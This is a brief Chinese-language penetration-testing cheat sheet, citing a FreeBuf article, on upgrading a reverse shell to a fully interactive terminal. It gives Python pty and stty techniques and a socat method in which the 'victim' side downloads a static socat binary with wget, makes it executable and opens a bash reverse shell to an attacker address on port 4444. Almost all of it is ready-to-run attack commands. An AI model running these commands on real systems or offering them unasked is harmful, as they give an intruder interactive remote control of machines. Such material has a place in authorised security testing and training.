https://www.freebuf.com/news/142195.html
方法1:
使用Python作为一个伪终端
python -c 'import pty; pty.spawn("/bin/bash")'
方法2:
使用socat
#Listener:
socat file:`tty`,raw,echo=0 tcp-listen:4444
#Victim:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
方法3:
使用stty选项
In reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
In Kali
$ stty raw -echo
$ fg
In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>